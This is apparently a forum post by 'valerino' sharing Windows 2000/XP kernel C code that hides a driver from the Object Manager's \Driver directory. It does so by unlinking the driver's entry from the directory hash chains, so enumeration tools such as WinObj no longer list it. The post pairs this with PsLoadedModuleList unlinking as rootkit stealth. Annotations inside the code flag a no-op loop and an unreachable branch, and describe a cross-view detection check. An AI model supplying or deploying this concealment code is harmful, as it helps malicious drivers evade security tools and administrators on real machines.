How to properly hide a driver from the Object Directory with *NO HOOKS* By: valerino. Heya, it's me again :) This time I present a technique to *properly* and fully hide a kernel mode driver from the tools which (until now) could detect every running driver (at least, the drivers I find here). Combined with the PsLoadedModuleList technique, it could be enough to hide from almost everything. These tools (winobj, devicetree, devfilter, to name a few) simply parse the object manager via ZwQueryObjectDirectory, so a simple hook (it's trivial and fully documented if you search on google) could do the job easily. But hooks are lame, so we need a more l3333t solution, ain't it? :) The solution is to avoid the hook and simply mangle the list, as we usually do with PsLoadedModuleList (but with PsLoadedModuleList your driver is *not* hidden from directory object scans, unfortunately...). How to do it? After some hours of work, here's the code:
///////////////////////////////////////////////////////////////////////////////////////////////////////////////////
/*********************************************************************
 * Needed stuff found on the internet (presumably lifted from the NT
 * sources). These are private Object Manager layouts that are not in
 * the DDK headers; the author reports them working on 2k/XP only, so
 * they should be treated as build-specific, not stable.
 *********************************************************************/
#define NUMBER_HASH_BUCKETS 37

/* One link in a directory hash chain: the next link and the object it names. */
typedef struct _OBJECT_DIRECTORY_ENTRY {
    struct _OBJECT_DIRECTORY_ENTRY *ChainLink;
    PVOID Object;
} OBJECT_DIRECTORY_ENTRY, *POBJECT_DIRECTORY_ENTRY;

/* An Object Manager directory (e.g. \Driver): NUMBER_HASH_BUCKETS singly linked chains. */
typedef struct _OBJECT_DIRECTORY {
    struct _OBJECT_DIRECTORY_ENTRY *HashBuckets[ NUMBER_HASH_BUCKETS ];
    struct _OBJECT_DIRECTORY_ENTRY **LookupBucket;
    BOOLEAN LookupFound;
    USHORT SymbolicLinkUsageCount;
    struct _DEVICE_MAP *DeviceMap;
} OBJECT_DIRECTORY, *POBJECT_DIRECTORY;

/* Referenced by OBJECT_DIRECTORY; not used by the code below. */
typedef struct _DEVICE_MAP {
    ULONG ReferenceCount;
    POBJECT_DIRECTORY DosDevicesDirectory;
    ULONG DriveMap;
    UCHAR DriveType[ 32 ];
} DEVICE_MAP, *PDEVICE_MAP;

/* Name information attached to an object header: the directory the object
 * is filed in and its name. Note the code below reads Name only and never
 * touches Directory. */
typedef struct _OBJECT_HEADER_NAME_INFO {
    POBJECT_DIRECTORY Directory;
    UNICODE_STRING Name;
    ULONG Reserved;
} OBJECT_HEADER_NAME_INFO, *POBJECT_HEADER_NAME_INFO;

/* Object body -> the OBJECT_HEADER that precedes it. */
#define OBJECT_TO_OBJECT_HEADER( o ) \
    CONTAINING_RECORD( (o), OBJECT_HEADER, Body )

/* OBJECT_HEADER -> its name info, located NameInfoOffset bytes before the
 * header; NULL when the offset is 0 (unnamed object). */
#define OBJECT_HEADER_TO_NAME_INFO( oh ) ((POBJECT_HEADER_NAME_INFO) \
    ((oh)->NameInfoOffset == 0 ? NULL : ((PCHAR)(oh) - (oh)->NameInfoOffset)))

/* Hand-written prototype (not in the DDK headers) used to open the \Driver directory. */
NTSTATUS ObOpenObjectByName (IN POBJECT_ATTRIBUTES ObjectAttributes,
                             IN POBJECT_TYPE ObjectType OPTIONAL,
                             IN KPROCESSOR_MODE AccessMode,
                             IN OUT PACCESS_STATE AccessState OPTIONAL,
                             IN ACCESS_MASK DesiredAccess OPTIONAL,
                             IN OUT PVOID ParseContext OPTIONAL,
                             OUT PHANDLE Handle);
//************************************************************************
// VOID StealthInitializeLateMore()
// (the original header named this HideFromObjectDirectory(); the code is
//  the same routine)
//
// Hide driver from object directory.
//
// Walks every hash bucket of the \Driver object directory and unlinks the
// OBJECT_DIRECTORY_ENTRY whose name matches MYDRIVER_NAME, so enumeration
// via ZwQueryObjectDirectory no longer reports the driver object.
//
// Only the directory link is removed. The driver object itself, its
// OBJECT_HEADER_NAME_INFO (whose Directory field still points at \Driver)
// and its loader entry are not modified here -- the author says the
// PsLoadedModuleList technique is a separate step. A cross-view check
// (directory contents vs. objects that claim membership in that
// directory) can key on exactly this inconsistency.
//
// MYDRIVER_NAME and mywcsstrsize are defined elsewhere in the module.
// The routine calls ObOpenObjectByName / ObReferenceObjectByHandle before
// raising IRQL, so it is presumably meant to run at PASSIVE_LEVEL.
//************************************************************************/
VOID StealthInitializeLateMore(VOID)
{
    OBJECT_ATTRIBUTES ObjectAttributes;
    UNICODE_STRING ucName;
    NTSTATUS Status;
    HANDLE hDirectory = NULL;                       // handle to \Driver, closed at __exit
    POBJECT_DIRECTORY pDirectoryObject = NULL;      // referenced object behind hDirectory
    KIRQL OldIrql;
    POBJECT_HEADER ObjectHeader;
    POBJECT_HEADER_NAME_INFO NameInfo;
    POBJECT_DIRECTORY_ENTRY DirectoryEntry;         // current entry in the bucket chain
    POBJECT_DIRECTORY_ENTRY DirectoryEntryNext;     // entry after DirectoryEntry
    POBJECT_DIRECTORY_ENTRY DirectoryEntryTop;      // scratch for the head-of-bucket case
    ULONG Bucket = 0;
    UNICODE_STRING ObjectName;
    BOOLEAN found = FALSE;

    // open driver directory in the object directory
    RtlInitUnicodeString(&ucName,L"\\Driver");
    InitializeObjectAttributes(&ObjectAttributes,&ucName,OBJ_CASE_INSENSITIVE,NULL,NULL);
    // 0x80000000 is the raw GENERIC_READ bit
    Status = ObOpenObjectByName(&ObjectAttributes,NULL,KernelMode,NULL,0x80000000,NULL,&hDirectory);
    if (!NT_SUCCESS (Status)) goto __exit;

    // get pointer from handle (no ObjectType passed, so the handle's type is not checked)
    Status = ObReferenceObjectByHandle(hDirectory,FILE_ANY_ACCESS,NULL,KernelMode,&pDirectoryObject, NULL);
    if (!NT_SUCCESS (Status)) goto __exit;

    // author's rationale: raise IRQL so kernel APCs on this processor cannot
    // run while the chains are being rewritten
    KeRaiseIrql(APC_LEVEL,&OldIrql);

    // walk the object directory, one bucket chain at a time
    for (Bucket=0; Bucket<NUMBER_HASH_BUCKETS; Bucket++) {
        // are we done yet ?
        if (found) break;

        DirectoryEntry = pDirectoryObject->HashBuckets[Bucket];
        if (!DirectoryEntry) continue;

        // case 1: the matching object is the head of this bucket
        ObjectHeader = OBJECT_TO_OBJECT_HEADER( DirectoryEntry->Object );
        NameInfo = OBJECT_HEADER_TO_NAME_INFO( ObjectHeader );
        if (NameInfo != NULL) {
            ObjectName = NameInfo->Name;
            // compare the object's name with MYDRIVER_NAME; mywcsstrsize is the
            // author's length-bounded wcsstr variant (defined elsewhere)
            if (mywcsstrsize(ObjectName.Buffer,MYDRIVER_NAME, ObjectName.Length,wcslen (MYDRIVER_NAME)* sizeof (WCHAR))) {
                // get top and next pointers
                DirectoryEntryTop = pDirectoryObject->HashBuckets[Bucket];
                DirectoryEntryNext = DirectoryEntryTop->ChainLink;
                // substitute top: the bucket now starts at the second entry,
                // which is the whole unlink for this case
                pDirectoryObject->HashBuckets[Bucket] = DirectoryEntryNext;
                DirectoryEntryTop = pDirectoryObject->HashBuckets[Bucket];
                // NOTE(review): Top and Next start equal and advance in lockstep,
                // so each assignment stores a ChainLink back into itself. This
                // loop changes nothing and exits with Top == NULL, so the
                // trailing if is never taken.
                while (DirectoryEntryNext) {
                    DirectoryEntryTop->ChainLink = DirectoryEntryNext->ChainLink;
                    DirectoryEntryTop = DirectoryEntryTop->ChainLink;
                    DirectoryEntryNext = DirectoryEntryNext->ChainLink;
                }
                if (DirectoryEntryTop) DirectoryEntryTop->ChainLink = NULL;

                // found (KdPrint only produces output in checked/DBG builds)
                KdPrint (("Object directory entry unlinked OK!\n"));
                found = TRUE;
                // leaves the for loop
                break;
            }
        }

        // case 2: the matching object is somewhere after the head; keep
        // DirectoryEntry one step behind DirectoryEntryNext so the predecessor
        // is available for the unlink
        DirectoryEntryNext = DirectoryEntry->ChainLink;

        while (DirectoryEntryNext) {
            ObjectHeader = OBJECT_TO_OBJECT_HEADER( DirectoryEntryNext->Object );
            NameInfo = OBJECT_HEADER_TO_NAME_INFO( ObjectHeader );
            if (NameInfo != NULL) {
                ObjectName = NameInfo->Name;
                if (mywcsstrsize(ObjectName.Buffer,MYDRIVER_NAME, ObjectName.Length,wcslen (MYDRIVER_NAME)* sizeof (WCHAR))) {
                    // found our object: bypass it by pointing the predecessor
                    // at its successor. The entry itself is not freed.
                    DirectoryEntry->ChainLink = DirectoryEntryNext->ChainLink;
                    KdPrint (("Object directory entry unlinked OK!\n"));
                    found = TRUE;
                    // leaves the while loop; the for loop then stops on 'found'
                    break;
                }
            }
            // advance both cursors. DirectoryEntry->ChainLink is DirectoryEntryNext
            // here, which the loop condition has just checked is non-NULL, so the
            // else branch appears unreachable.
            if (DirectoryEntry) {
                DirectoryEntry = DirectoryEntry->ChainLink;
                DirectoryEntryNext = DirectoryEntry->ChainLink;
            } else {
                DirectoryEntryNext = NULL;
            }
        }
    }

    // adjust back the irql
    KeLowerIrql(OldIrql);

__exit:   // NOTE: identifiers beginning with '__' are reserved for the implementation
    // dereference and cleanup; both are NULL on the early-exit paths that skipped them
    if (pDirectoryObject) ObDereferenceObject(pDirectoryObject);
    if (hDirectory) ZwClose (hDirectory);
    return;
}
///////////////////////////////////////////////////////////////////////////////////////////////////////////////////
Here we go... tested and works on every 2k/XP I've got around... should be enough :) cowabunga, valerino